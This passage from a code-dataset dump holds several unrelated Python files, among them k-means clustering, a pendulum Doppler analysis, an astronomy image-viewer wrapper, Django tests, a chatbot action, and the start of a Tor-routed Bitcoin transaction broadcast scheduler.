datapath+time.strftime(\"%Y%m%d.txt\",rec_time)\n\tcurrent_file = open(current_file_name,\"a\")\n\tcurrent_file.write(file_line+\"\\n\")\n\tcurrent_file.flush()\n\tcurrent_file.close()\n\tline = \"\"\n\tbline = bytearray()\n\t# Compress data if required\n\t# Is it the last minute of the day?\n\tif flags[0] == 1:\n\t\tif current_file_name != prev_file_name:\n\t\t\tsubprocess.call([\"gzip\",prev_file_name])\n\t\t\tprev_file_name = current_file_name\t\nprint('I\\'m done')\n","sub_path":"logger_main.py","file_name":"logger_main.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"502534860","text":"import numpy as np\n\n\nclass Cluster:\n def __init__(self, centre):\n self.members_list = list()\n self.centre = centre\n self.mean_point = np.zeros(centre.size)\n\n def append(self, x):\n self.members_list.append(x)\n self.mean_point += (x - self.mean_point) / self.members_list.__len__()\n\n def update_centre(self):\n self.centre = self.mean_point\n\n def clean(self):\n self.members_list = list()\n self.mean_point=np.zeros(self.centre.size)\n\n def sum_squared_error(self):\n error = 0\n for x in self.members_list:\n error += np.linalg.norm(x - self.centre) ** 2\n return error\n\n\nclass kMeans:\n def __init__(self, k_num, data):\n self.cluster_list = [Cluster(i) for i in data[np.random.choice(data.shape[0], k_num, replace=False)]]\n self.error=self.cluster_data(data)\n\n def cluster_data(self, data):\n iterations = 0\n curr_error=0\n prev_error=0\n while iterations < 100:\n iterations += 1\n if iterations % 10 == 0:\n if prev_error > curr_error:\n break\n for x in data:\n closest_cluster = self.calc_closest(x)\n closest_cluster.append(x)\n\n prev_error = curr_error\n curr_error = 0\n for x in self.cluster_list:\n x.update_centre()\n curr_error += x.sum_squared_error()\n x.clean()\n return curr_error\n\n\n def calc_closest(self, x):\n closest = self.cluster_list[0]\n for mu in self.cluster_list:\n if self.distance_metric(x, mu) < self.distance_metric(x, closest):\n closest = mu\n return closest\n\n def distance_metric(self, x, cluster):\n return np.linalg.norm(x - cluster.centre)\n","sub_path":"kMeans.py","file_name":"kMeans.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"462660629","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.optimize import curve_fit\r\nfrom scipy.integrate import trapz\r\n\r\ndef func(x, a, omega, phi):\r\n return a * np.sin(omega * x + phi)\r\n\r\n# adatok betoltese\r\ndata = np.loadtxt('meresek\\\\3doppler_inga6ts15.csv', delimiter='\\t', skiprows=1)\r\n\r\n# tengelyek definialasa\r\nTime = data[:,0]\r\nFreq = data[:,1]\r\nSpeed = data[:,2]\r\n\r\n# nan adatok kivetele\r\nfor idx, val in enumerate(Freq):\r\n if np.isnan(val):\r\n Freq[idx] = 1000\r\n Speed[idx] = 0\r\n \r\n# Az elmozdulas numerikus integrálása a sebessegbol trapezszaballyal\r\nPos = np.zeros((Time.size))\r\nfor i, val in enumerate(Speed):\r\n Pos[i] = trapz(Speed[:i]-np.mean(Speed), Time[:i])\r\n \r\n# szogkiteres meghatarozasa az elmozdulasbol ha l = 71 cm\r\nAlpha = Pos / 0.71\r\n\r\n# hibabecsles\r\nFrerror = 1\r\nSperror = (340 * 1000)/(Freq**2) * Frerror\r\nPerror = Sperror\r\nAlpherror = Alpha * np.sqrt( (Perror/Pos)**2 + (1/71)**2 )\r\n\r\n# betutipus beallitasa\r\nplt.rc('text', usetex=True)\r\nplt.rc('font', family='serif')\r\n\r\n# abrazolas, tengelyek elnevezese, cim, stb.\r\nfig, axs = plt.subplots(2, sharex=True)\r\nfig.suptitle('Inga mérése Doppler-effektussal')\r\n\r\nfitlim=600\r\naxs[0].plot(Time, Alpha, '.', color='crimson', label = 'Mért szögkitérés a sebesség numerikus integrálásából')\r\naxs[1].plot(Time, Pos, '.', color='orange', label = 'A lengés irányába vett elmozdulás numerikus integrálásból')\r\n\r\n# hiba abrazolasa es szinuszfuggveny illesztes hibaval\r\naxs[0].errorbar(Time, Alpha, yerr=Alpherror, fmt=' ', color='#FE6F5E')\r\naxs[1].errorbar(Time, Pos, yerr=Perror, fmt=' ', color='yellow')\r\npopt, pcov = curve_fit(func, Time[:fitlim], Speed[:fitlim], sigma = Sperror[:fitlim], p0=[1, 3.14,-3.14], method='lm')\r\n\r\n# szogkiteres, elomzdulas illesztesbol\r\nTheoAlph = -popt[0]/(popt[1]*0.71) * np.cos( popt[1] * Time + popt[2])\r\nTheoPos = -popt[0]/popt[1] * np.cos( popt[1] * Time + popt[2])\r\n\r\n\r\nprint(popt, '\\n',pcov)\r\n\r\n# uj amplitudo hibaja kiteresre\r\nnewamp_err = popt[0]/popt[1] * np.sqrt( (np.sqrt(pcov[0][0])/popt[0])**2 + (np.sqrt(pcov[1][1])/popt[1])**2 )\r\n# szogre\r\nnewamp_err2 = popt[0]/(popt[1] *0.71 ) * np.sqrt( (np.sqrt(pcov[0][0])/popt[0])**2 + (np.sqrt(pcov[1][1])/popt[1])**2 + (1/71)**2 )\r\n\r\n\r\naxs[0].plot(Time[:fitlim], TheoAlph[:fitlim], 'orange',\r\n label = '$\\\\varphi (t) =$ ( ' + str( round(1/popt[0]/(popt[1] *0.71 ), 4) ) + ' $\\pm$ ' + str( round(newamp_err2, 4) ) +' ) $\\cdot \\cos(($'\r\n + str( round(popt[1], 4) ) + ' $\\pm$ ' + str( round(np.sqrt(pcov[1][1]), 4) ) + '$) \\cdot t)$ rad')\r\naxs[1].plot(Time[:fitlim], TheoPos[:fitlim], 'crimson',\r\n label = '$s (t) =$ ( ' + str( round(1/popt[0]/popt[1], 4) ) + ' $\\pm$ ' + str( round(newamp_err, 4) ) +' ) $\\cdot \\cos(($'\r\n + str( round(popt[1], 4) ) + ' $\\pm$ ' + str( round(np.sqrt(pcov[1][1]), 4) ) + '$) \\cdot t)$ m')\r\n\r\nplt.xlabel('$t$ (s)')\r\naxs[0].set_ylabel('$\\\\varphi$ (rad)')\r\naxs[1].set_ylabel('$s$ (m)')\r\n\r\nfor ax in axs:\r\n ax.legend(loc='upper left')\r\n ax.grid()\r\n\r\n# grafikon mentese\r\nplt.savefig('doppler_inga2', dpi=300)","sub_path":"doppler_inga2.py","file_name":"doppler_inga2.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"101679252","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\"\"\"\nThis class supports communication with a Ginga-based viewer.\n\nFor default key and mouse shortcuts in a Ginga window, see:\n https://ginga.readthedocs.org/en/latest/quickref.html\n\n\"\"\"\n\nfrom __future__ import print_function, division, absolute_import\n\nimport sys\nimport os\nimport traceback\nimport time\nimport warnings\nimport logging\nimport threading\nimport numpy as np\n\nfrom . import util\nfrom astropy.io import fits\n\nfrom ginga.misc import log, Settings\nfrom ginga.AstroImage import AstroImage\nfrom ginga import cmap\nfrom ginga.util import paths\n#from ginga.qtw.QtHelp import QtGui\n\nimport matplotlib\nfrom matplotlib import pyplot as plt\n# module variables\n_matplotlib_cmaps_added = False\n\n__all__ = ['ginga_mp']\n\n\nclass ginga_general(object):\n\n \"\"\" A class which controls all interactions between the user and the\n ginga window\n\n The ginga_mp() contructor creates a new window with the matplotlib backend\n\n Parameters\n ----------\n close_on_del : boolean, optional\n If True, try to close the window when this instance is deleted.\n\n\n Attributes\n ----------\n view: Ginga view object\n The object instantiated from a Ginga view class\n\n exam: imexamine object\n \"\"\"\n\n def __init__(self, exam=None, close_on_del=True, logger=None):\n \"\"\"\n\n Notes\n -----\n Ginga viewers all need a logger, if none is provided it will create one\n\n\n \"\"\"\n global _matplotlib_cmaps_added\n\n self.exam = exam\n self._close_on_del = close_on_del\n # dictionary where each key is a frame number, and the values are a\n # dictionary of details about the image loaded in that frame\n self._viewer = dict()\n self._current_frame = 1\n self._current_slice = None\n\n self.ginga_view = None # ginga view object\n\n self._define_cmaps() # set up possible color maps\n\n # for synchronizing on keystrokes\n self._cv = threading.RLock()\n self._kv = []\n self._capturing = False\n\n # ginga objects need a logger, create a null one if we are not\n # handed one in the constructor\n if logger is None:\n logger = log.get_logger(null=True)\n self.logger = logger\n self._saved_logger = logger\n self._debug_logger = log.get_logger(level=10, log_stderr=True)\n\n # Establish settings (preferences) for ginga viewers\n basedir = paths.ginga_home\n self.prefs = Settings.Preferences(\n basefolder=basedir,\n logger=self.logger)\n\n # general preferences shared with other ginga viewers\n settings = self.prefs.createCategory('general')\n settings.load(onError='silent')\n settings.setDefaults(useMatplotlibColormaps=False,\n autocuts='on', autocut_method='zscale')\n self.settings = settings\n\n # add matplotlib colormaps to ginga's own set if user has this\n # preference set\n if settings.get('useMatplotlibColormaps', False) and \\\n (not _matplotlib_cmaps_added):\n # Add matplotlib color maps if matplotlib is installed\n try:\n cmap.add_matplotlib_cmaps()\n _matplotlib_cmaps_added = True\n except Exception as e:\n print(\n \"Failed to load matplotlib colormaps: {0}\".format(\n str(e)))\n\n # bindings preferences shared with other ginga viewers\n bind_prefs = self.prefs.createCategory('bindings')\n bind_prefs.load(onError='silent')\n\n # viewer preferences unique to imexam ginga viewers\n viewer_prefs = self.prefs.createCategory('imexam')\n viewer_prefs.load(onError='silent')\n\n # create the viewer specific to this backend\n self._create_viewer(bind_prefs, viewer_prefs)\n\n # enable all interactive ginga features\n bindings = self.ginga_view.get_bindings()\n bindings.enable_all(True)\n self.ginga_view.add_callback('key-press', self._key_press_normal)\n\n canvas = self.canvas\n canvas.enable_draw(False)\n canvas.add_callback('key-press', self._key_press_imexam)\n canvas.setSurface(self.ginga_view)\n canvas.ui_setActive(True)\n self.canvas = canvas\n\n def _draw_indicator(self):\n return\n # -- Here be black magic ------\n # This function draws the imexam indicator on the lower left\n # hand corner of the canvas\n\n try:\n # delete previous indicator, if there was one\n self.canvas.deleteObjectByTag('indicator')\n except:\n pass\n\n # assemble drawing classes\n canvas = self.canvas\n Text = canvas.getDrawClass('text')\n Rect = canvas.getDrawClass('rectangle')\n Compound = canvas.getDrawClass('compoundobject')\n\n # calculations for canvas coordinates\n mode = 'imexam'\n xsp, ysp = 6, 6\n wd, ht = self.ginga_view.get_window_size()\n #x1, y1 = wd-12*len(mode), ht-12\n x1, y1 = 12, 12\n o1 = Text(x1, y1, mode,\n fontsize=12, color='orange', coord='canvas')\n #o1.fitsimage = self.view\n wd, ht = o1.get_dimensions()\n\n # yellow text on a black filled rectangle\n o2 = Compound(Rect(x1 - xsp, y1 - ht - ysp, x1 + wd + xsp, y1 + ht + ysp,\n color='black',\n fill=True, fillcolor='black', coord='canvas'),\n o1, coord='canvas')\n\n # use canvas, not data coordinates\n\n canvas.add(o2, tag='indicator')\n # -- end black magic ------\n\n def _create_viewer(self, bind_prefs, viewer_prefs):\n \"\"\"Create backend-specific viewer.\"\"\"\n raise Exception(\"Subclass should override this method!\")\n\n def _capture(self):\n \"\"\"\n Insert our canvas so that we intercept all events before they reach\n processing by the bindings layer of Ginga.\n \"\"\"\n self.ginga_view.onscreen_message(\"Entering imexam mode\",\n delay=1.0)\n # insert the canvas\n self.ginga_view.add(self.canvas, tag='mycanvas')\n self._draw_indicator()\n self._capturing = True\n\n def _release(self):\n \"\"\"\n Remove our canvas so that we no longer intercept events.\n \"\"\"\n self.ginga_view.onscreen_message(\"Leaving imexam mode\",\n delay=1.0)\n self._capturing = False\n self.canvas.deleteObjectByTag('indicator')\n\n # retract the canvas\n self.ginga_view.deleteObjectByTag('mycanvas')\n\n def __str__(self):\n return \"\"\n\n def __del__(self):\n if self._close_on_del:\n self.close()\n\n def _set_frameinfo(self, frame, fname=None, hdu=None, data=None,\n image=None):\n \"\"\"Set the name and extension information for the data displayed in\n frame n and gather header information.\n\n Notes\n -----\n \"\"\"\n\n # check the current frame, if none exists, then don't continue\n if frame:\n if frame not in self._viewer.keys():\n self._viewer[frame] = dict()\n\n if data is None or not data.any():\n try:\n data = self._viewer[frame]['user_array']\n except KeyError:\n pass\n\n extver = None # extension number\n extname = None # name of extension\n filename = None # filename of image\n numaxis = 2 # number of image planes, this is NAXIS\n # tuple of each image plane, defaulted to 1 image plane\n naxis = (0)\n # data has more than 2 dimensions and loads in cube/slice frame\n iscube = False\n mef_file = False # used to check misleading headers in fits files\n\n if hdu:\n pass\n\n # update the viewer dictionary, if the user changes what's displayed in a frame this should update correctly\n # this dictionary will be referenced in the other parts of the code. This enables tracking user arrays through\n # frame changes\n\n self._viewer[frame] = {'filename': fname,\n 'extver': extver,\n 'extname': extname,\n 'naxis': naxis,\n 'numaxis': numaxis,\n 'iscube': iscube,\n 'user_array': data,\n 'image': image,\n 'hdu': hdu,\n 'mef': mef_file}\n\n def valid_data_in_viewer(self):\n \"\"\"return bool if valid file or array is loaded into the viewer\"\"\"\n frame = self.frame()\n\n if self._viewer[frame]['filename']:\n return True\n else:\n try:\n if self._viewer[frame]['user_array'].any():\n valid = True\n elif self._viewer[frame]['hdu'].any():\n valid = True\n elif self._viewer[frame]['image'].any():\n valid = True\n except AttributeError as ValueError:\n valid = False\n print(\"error in array\")\n\n return valid\n\n def get_filename(self):\n \"\"\"return the filename currently on display\"\"\"\n frame = self.frame()\n if frame:\n return self._viewer[frame]['filename']\n\n def get_frame_info(self):\n \"\"\"return more explicit information about the data displayed in the current frame\"\"\"\n return self._viewer[self.frame()]\n\n def get_viewer_info(self):\n \"\"\"Return a dictionary of information about all frames which are loaded with data\"\"\"\n return self._viewer\n\n def close(self):\n \"\"\" close the window\"\"\"\n plt.close(self.figure)\n\n def readcursor(self):\n \"\"\"returns image coordinate postion and key pressed,\n\n Notes\n -----\n \"\"\"\n # insert canvas to trap keyboard events if not already inserted\n if not self._capturing:\n self._capture()\n\n with self._cv:\n self._kv = ()\n\n # wait for a key press\n # NOTE: the viewer now calls the functions directly from the\n # dispatch table, and only returns on the quit key here\n while True:\n # ugly hack to suppress deprecation by mpl\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n # run event loop, so window can get a keystroke\n self.figure.canvas.start_event_loop(timeout=0.1)\n\n with self._cv:\n # did we get a key event?\n if len(self._kv) > 0:\n (k, x, y) = self._kv\n break\n\n # ginga is returning 0 based indexes\n return x + 1, y + 1, k\n\n def _define_cmaps(self):\n \"\"\"setup the default color maps which are available\"\"\"\n\n # get ginga color maps\n self._cmap_colors = cmap.get_names()\n\n def cmap(self, color=None, load=None, invert=False, save=False,\n filename='colormap.ds9'):\n \"\"\" Set the color map table to something else, using a defined list of options\n\n\n Parameters\n ----------\n color: string\n color must be set to one of the available DS9 color map names\n\n load: string, optional\n set to the filename which is a valid colormap lookup table\n valid contrast values are from 0 to 10, and valid bias values are from 0 to 1\n\n invert: bool, optional\n invert the colormap\n\n save: bool, optional\n save the current colormap as a file\n\n filename: string, optional\n the name of the file to save the colormap to\n\n \"\"\"\n\n if color:\n if color in self._cmap_colors:\n self.ginga_view.set_color_map(color)\n else:\n print(\"Unrecognized color map, choose one of these:\")\n print(self._cmap_colors)\n\n # these should be pretty easy to support if we use matplotlib\n # to load them\n if invert:\n warnings.warn(\"Colormap invert not supported\")\n\n if load:\n warnings.warn(\"Colormap loading not supported\")\n\n if save:\n warnings.warn(\"Colormap saving not supported\")\n\n def frame(self, n=None):\n \"\"\"convenience function to change or report frames\n\n\n Parameters\n ----------\n n: int, string, optional\n The frame number to open or change to. If the number specified doesn't exist, a new frame will be opened\n If nothing is specified, then the current frame number will be returned.\n\n Examples\n --------\n frame(1) sets the current frame to 1\n frame(\"last\") set the current frame to the last frame\n frame() returns the number of the current frame\n frame(\"new\") opens a new frame\n frame(3) opens frame 3 if it doesn't exist already, otherwise goes to frame 3\n\n \"\"\"\n frame = self._current_frame\n n_str = str(n)\n frames = sorted(self._viewer.keys())\n\n if not n is None:\n if n_str == \"delete\":\n if frame in frames:\n del self._viewer[frame]\n frames = self._viewer.keys()\n if len(frames) > 0:\n n = frames[0]\n else:\n n = None\n\n elif n_str == \"new\":\n n = frames[-1]\n n += 1\n self._set_frameinfo(n)\n\n elif n_str == \"last\":\n n = frames[-1]\n\n elif n_str == \"first\":\n n = frames[0]\n\n else:\n n = int(n)\n if not n in frames:\n print(\"%d is not a created frame.\" % (n))\n\n self._current_frame = n\n image = self._viewer[frame]['image']\n if image is not None:\n self.ginga_view.set_image(image)\n return n\n\n else:\n return frame\n\n def iscube(self):\n \"\"\"return information on whether a cube image is displayed in the current frame\"\"\"\n frame = self.frame()\n if frame:\n return self._viewer[frame]['iscube']\n\n def get_slice_info(self):\n \"\"\"return the slice tuple that is currently displayed\"\"\"\n frame = self.frame()\n\n if self._viewer[frame]['iscube']:\n image_slice = self._viewer[frame]['naxis']\n else:\n image_slice = None\n return image_slice\n\n def get_data(self):\n \"\"\" return a numpy array of the data displayed in the current frame\n \"\"\"\n\n frame = self.frame()\n if frame:\n if isinstance(self._viewer[frame]['user_array'], np.ndarray):\n return self._viewer[frame]['user_array']\n\n elif self._viewer[frame]['hdu'] != None:\n return self._viewer[frame]['hdu'].data\n\n elif self._viewer[frame]['image'] != None:\n return self._viewer[frame]['image'].get_data()\n\n def get_header(self):\n \"\"\"return the current fits header as a string or None if there's a problem\"\"\"\n\n # TODO return the simple header for arrays which are loaded\n\n frame = self.frame()\n if frame and self._viewer[frame]['hdu'] != None:\n hdu = self._viewer[frame]['hdu']\n return hdu.header\n else:\n warnings.warn(\"No file with header loaded into ginga\")\n return None\n\n def _key_press_normal(self, canvas, keyname):\n \"\"\"\n This callback function is called when a key is pressed in the\n ginga window without the canvas overlaid. It's sole purpose is to\n recognize an 'i' to put us into 'imexam' mode.\n \"\"\"\n if keyname == 'i':\n self._capture()\n return True\n return False\n\n def _key_press_imexam(self, canvas, keyname):\n \"\"\"\n This callback function is called when a key is pressed in the\n ginga window with the canvas overlaid. It handles all the\n dispatch of the 'imexam' mode.\n \"\"\"\n data_x, data_y = self.ginga_view.get_last_data_xy()\n self.logger.debug(\"key %s pressed at data %f,%f\" % (\n keyname, data_x, data_y))\n\n if keyname == 'i':\n # temporarily switch to non-imexam mode\n self._release()\n return True\n\n elif keyname == 'backslash':\n # exchange normal logger for the stdout debug logger\n if self.logger != self._debug_logger:\n self.logger = self._debug_logger\n self.ginga_view.onscreen_message(\"Debug logging on\",\n delay=1.0)\n else:\n self.logger = self._saved_logger\n self.ginga_view.onscreen_message(\"Debug logging off\",\n delay=1.0)\n return True\n\n elif keyname == 'q':\n # exit imexam mode\n self._release()\n\n with self._cv:\n # this will be picked up by the caller in readcursor()\n self._kv = (keyname, data_x, data_y)\n return True\n\n # get our data array\n data = self.get_data()\n self.logger.debug(\n \"x,y,data dim: %f %f %i\" %\n (data_x, data_y, data.ndim))\n self.logger.debug(\"exam=%s\" % str(self.exam))\n # call the imexam function directly\n if self.exam is not None:\n try:\n method = self.exam.imexam_option_funcs[keyname][0]\n except KeyError:\n self.logger.debug(\n \"no method defined in the option_funcs dictionary\")\n return False\n\n self.logger.debug(\n \"calling examine function key={0}\".format(keyname))\n try:\n method(data_x, data_y, data)\n except Exception as e:\n self.logger.error(\"Failed examine function: %s\" % (str(e)))\n try:\n # log traceback, if possible\n (type, value, tb) = sys.exc_info()\n tb_str = \"\".join(traceback.format_tb(tb))\n self.logger.error(\"Traceback:\\n%s\" % (tb_str))\n except Exception:\n tb_str = \"Traceback information unavailable.\"\n self.logger.error(tb_str)\n\n return True\n\n def load_fits(self, fname=\"\", extver=1, extname=None):\n \"\"\"convenience function to load fits image to current frame\n\n Parameters\n ----------\n fname: string, optional\n The name of the file to be loaded. You can specify the full extension in the name, such as\n filename_flt.fits[sci,1] or filename_flt.fits[1]\n\n extver: int, optional\n The extension to load (EXTVER in the header)\n\n extname: string, optional\n The name (EXTNAME in the header) of the image to load\n\n Notes\n -----\n \"\"\"\n if fname:\n # see if the image is MEF or Simple\n fname = os.path.abspath(fname)\n short = True\n try:\n mef = util.check_filetype(fname)\n if not mef:\n extver = 0\n cstring = util.verify_filename(fname, getshort=short)\n image = AstroImage(logger=self.logger)\n\n with fits.open(cstring) as filedata:\n hdu = filedata[extver]\n image.load_hdu(hdu)\n\n except Exception as e:\n self.logger.error(\"Exception opening file: {0}\".format(e))\n raise IOError(str(e))\n\n frame = self.frame()\n self._set_frameinfo(frame, fname=fname, hdu=hdu, image=image)\n self.ginga_view.set_image(image)\n\n else:\n print(\"No filename provided\")\n\n def panto_image(self, x, y):\n \"\"\"convenience function to change to x,y physical image coordinates\n\n\n Parameters\n ----------\n x: float\n X location in physical coords to pan to\n\n y: float\n Y location in physical coords to pan to\n\n\n \"\"\"\n # ginga deals in 0-based coords\n x, y = x - 1, y - 1\n\n self.ginga_view.set_pan(x, y)\n\n def panto_wcs(self, x, y, system='fk5'):\n \"\"\"pan to wcs location coordinates in image\n\n\n Parameters\n ----------\n\n x: string\n The x location to move to, specified using the given system\n y: string\n The y location to move to\n system: string\n The reference system that x and y were specified in, they should be understood by DS9\n\n \"\"\"\n # this should be replaced by querying our own copy of the wcs\n image = self.ginga_view.get_image()\n a, b = image.radectopix(x, y, coords='data')\n self.ginga_view.set_pan(a, b)\n\n def rotate(self, value=None):\n \"\"\"rotate the current frame (in degrees), the current rotation is printed with no params\n\n Parameters\n ----------\n\n value: float [degrees]\n Rotate the current frame {value} degrees\n If value is None, then the current rotation is printed\n\n \"\"\"\n if value is not None:\n self.ginga_view.rotate(value)\n\n rot_deg = self.ginga_view.get_rotation()\n print(\"Image rotated at {0:f} deg\".format(rot_deg))\n\n def transform(self, flipx=None, flipy=None, flipxy=None):\n \"\"\"transform the frame\n\n Parameters\n ----------\n\n flipx: boolean\n if True flip the X axis, if False don't, if None leave current\n flipy: boolean\n if True flip the Y axis, if False don't, if None leave current\n swapxy: boolean\n if True swap the X and Y axes, if False don't, if None leave current\n \"\"\"\n _flipx, _flipy, _swapxy = self.ginga_view.get_transform()\n\n # preserve current transform if not supplied as a parameter\n if flipx is None:\n flipx = _flipx\n if flipy is None:\n flipy = _flipy\n if swapxy is None:\n swapxy = _swapxy\n\n self.ginga_view.transform(flipx, flipy, swapxy)\n\n def save_png(self, filename=None):\n \"\"\"save a frame display as a PNG file\n\n Parameters\n ----------\n\n filename: string\n The name of the output PNG image\n\n \"\"\"\n if not filename:\n print(\"No filename specified, try again\")\n else:\n buf = self.ginga_view.get_png_image_as_buffer()\n with open(filename, 'w') as out_f:\n out_f.write(buf)\n\n def scale(self, scale='zscale'):\n \"\"\" The default zscale is the most widely used option\n\n Parameters\n ----------\n\n scale: string\n The scale for ds9 to use, these are set strings of\n [linear|log|pow|sqrt|squared|asinh|sinh|histequ]\n\n \"\"\"\n\n # setting the autocut method?\n mode_scale = self.ginga_view.get_autocut_methods()\n\n if scale in mode_scale:\n self.ginga_view.set_autocut_params(scale)\n return\n\n # setting the color distribution algorithm?\n color_dist = self.ginga_view.get_color_algorithms()\n\n if scale in color_dist:\n self.ginga_view.set_color_algorithm(scale)\n return\n\n def view(self, img):\n \"\"\" Display numpy image array to current frame\n\n Parameters\n ----------\n img: numpy array\n The array containing data, it will be forced to numpy.array()\n\n Examples\n --------\n view(np.random.rand(100,100))\n\n \"\"\"\n\n frame = self.frame()\n if not frame:\n print(\"No valid frame\")\n else:\n img_np = np.array(img)\n image = AstroImage(img_np, logger=self.logger)\n self._set_frameinfo(frame, data=img_np, image=image)\n self.ginga_view.set_image(image)\n\n def zoomtofit(self):\n \"\"\"convenience function for zoom\"\"\"\n self.ginga_view.zoom_fit()\n\n def zoom(self, zoomlevel):\n \"\"\" zoom using the specified level\n\n Parameters\n ----------\n zoomlevel: integer\n\n Examples\n --------\n zoom(6)\n zoom(-3)\n\n \"\"\"\n\n try:\n self.ginga_view.zoom_to(zoomlevel)\n\n except Exception as e:\n print(\"problem with zoom: %s\" % str(e))\n\n\nclass ginga_mp(ginga_general):\n\n \"\"\"\n A ginga-based viewer that uses a matplotlib widget.\n\n This kind of viewer has slower performance than if we\n choose a particular widget back end, but the advantage is that\n it works so long as the user has a working matplotlib.\n\n This implementation has the benefit of adding image overlays\n \"\"\"\n\n def _create_viewer(self, bind_prefs, viewer_prefs):\n\n # Ginga imports for matplotlib backend\n from ginga.mplw import ipg\n\n self.ginga_view = ipg.get_viewer()\n self.figure = self.ginga_view.figure\n\n self.figure.show()\n\n # create a canvas that we insert when doing imexam mode\n self.canvas = self.ginga_view.add_canvas()\n","sub_path":"imexam/ginga_viewer.py","file_name":"ginga_viewer.py","file_ext":"py","file_size_in_byte":25651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"75414964","text":"import pytz\nfrom django.conf import settings\nfrom django.test import TestCase\nfrom unittest.mock import patch\n\n# Import module\nfrom backend.video_manager import *\n\n\nclass GetClipInfoTest(TestCase):\n\n def setUp(self) -> None:\n self.fid = create_root_folder(path='home/user/', name='test_folder')\n self.cid = create_clip(name='test_clip', fid=self.fid, video_format='tvf', latitude=Decimal('0.0'),\n longitude=Decimal('0.0'),\n start_time=timezone.datetime(2020, 1, 17, tzinfo=pytz.timezone(settings.TIME_ZONE)),\n end_time=timezone.datetime(2020, 1, 18, tzinfo=pytz.timezone(settings.TIME_ZONE)),\n width=256, height=240, frame_rate=42)\n\n @patch('backend.video_manager.os_aware', side_effect=lambda x: x)\n def test_basic(self, mock_os_aware):\n \"\"\"\n Makes a simple call.\n \"\"\"\n code, res = get_clip_info(data={CLIP_ID: self.cid})\n self.assertEqual(code, 200)\n self.assertEqual(res, {'id': 1, 'name': 'test_clip', 'video_format': 'tvf',\n 'start_time': '2020-01-17T00:00:00+01:00',\n 'end_time': '2020-01-18T00:00:00+01:00', 'resolution': 1,\n 'frame_rate': 42.0, 'folder': 1, 'camera': 1,\n 'file_path': 'home/user/test_folder/test_clip.tvf'})\n\n\nclass GetCamerasTest(TestCase):\n\n def setUp(self) -> None:\n \"\"\"\n Create cameras and a project.\n \"\"\"\n self.pid = create_project(name=\"test_project\")\n self.lat = Decimal(value=\"13.37\")\n self.lon = Decimal(value=\"0.42\")\n self.st = timezone.datetime(2020, 1, 17, tzinfo=pytz.timezone(settings.TIME_ZONE))\n self.et = timezone.datetime(2020, 1, 18, tzinfo=pytz.timezone(settings.TIME_ZONE))\n self.rid = create_root_folder(path=\"/home/user/\", name=\"test_folder\")\n self.sid = create_subfolder(parent_fid=self.rid, name=\"test_subfolder\")\n create_clip(fid=self.rid, name=\"test_clip1\", video_format=\"tvf\", start_time=self.st,\n end_time=self.et, latitude=self.lat, longitude=self.lon, width=256, height=240,\n frame_rate=42.0)\n create_clip(fid=self.sid, name=\"test_clip2\", video_format=\"tvf\", start_time=self.st,\n end_time=self.et, latitude=self.lat, longitude=self.lon, width=256, height=240,\n frame_rate=42.0)\n create_clip(fid=self.sid, name=\"test_clip3\", video_format=\"tvf\", start_time=self.st,\n end_time=self.et, latitude=self.lon, longitude=self.lat, width=256, height=240,\n frame_rate=42.0)\n add_folder_to_project(fid=self.rid, pid=self.pid)\n\n def test_basic(self):\n \"\"\"\n Makes a simple call.\n \"\"\"\n code, res = get_cameras(data={PROJECT_ID: self.pid})\n self.assertEqual(code, 200)\n self.assertEqual(len(res[CAMERAS]), 2)\n\n def test_non_existing_project(self):\n \"\"\"\n Test with a project id that doesn't exist.\n \"\"\"\n code, res = get_cameras(data={PROJECT_ID: 42})\n self.assertEqual(code, 204)\n self.assertEqual(res, {})\n","sub_path":"backend/test/test_integration/test_video_manager.py","file_name":"test_video_manager.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"296796412","text":"from actions.action_base import ActionBase\n\n\nclass RegretAction(ActionBase):\n def __init__(self):\n super().__init__(name=\"REGRET\",\n keywords=[\"i'?ll cry\", \"i'?m crying\", 'that hurts?',\n 'sad now', \"i'?m sad\"],\n answers=[\"i'm sorry\", 'soz', \"i didn't mean it\",\n 'okay, i am sorry', 'soz man'])\n","sub_path":"src/actions/custom/regret/regret.py","file_name":"regret.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"652085421","text":"# txCast by 6102bitcoin\n# Schedule randomised Bitcoin transaction broadcasting to break timing analysis\n\nimport requests\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom stem import Signal\nfrom stem.control import Controller\nimport secrets\n\npassword = \"test\" # Change this to your tor password\n\ntx_list = []\ntime_list = []\nnext_broadcast_time = \"\"\n\n\ndef get_current_ip():\n session = requests.session()\n\n # TO Request URL with SOCKS over TOR\n session.proxies = {}\n session.proxies['http']='socks5h://localhost:9050'\n session.proxies['https']='socks5h://localhost:9050'\n\n try:\n ip = session.get('http://httpbin.org/ip').text\n ip = ip.partition('\\\"origin\\\": \\\"')[2]\n ip = ip.rpartition('\\\"')[0] # Get only IP\n except Exception as e:\n print(str(e))\n else:\n return ip\n\n\ndef renew_tor_ip():\n with Controller.from_port(port=9051) as controller:\n controller.authenticate(password=password)\n controller.signal(Signal.NEWNYM)\n time.sleep(secrets.SystemRandom().randint(15, 30)) # Ensure new IP used\n\n\ndef fuzz(exact_value, lower_limit_fraction, upper_limit_fraction):\n lower_limit = int(exact_value * lower_limit_fraction)\n upper_limit = int(exact_value * upper_limit_fraction)\n fuzzed_value = exact_value + secrets.SystemRandom().randint(lower_limit, upper_limit)\n return fuzzed_value\n\n\ndef build_lists():\n # Create randomly sorted list of transactions to broadcast:\n finished = False\n while not finished:\n tx_next = input('Enter Next Signed Transaction (Type X To END): ')\n if tx_next == \"X\" or tx_next == \"x\":\n finished = True\n print(\"Number of Signed Transactions 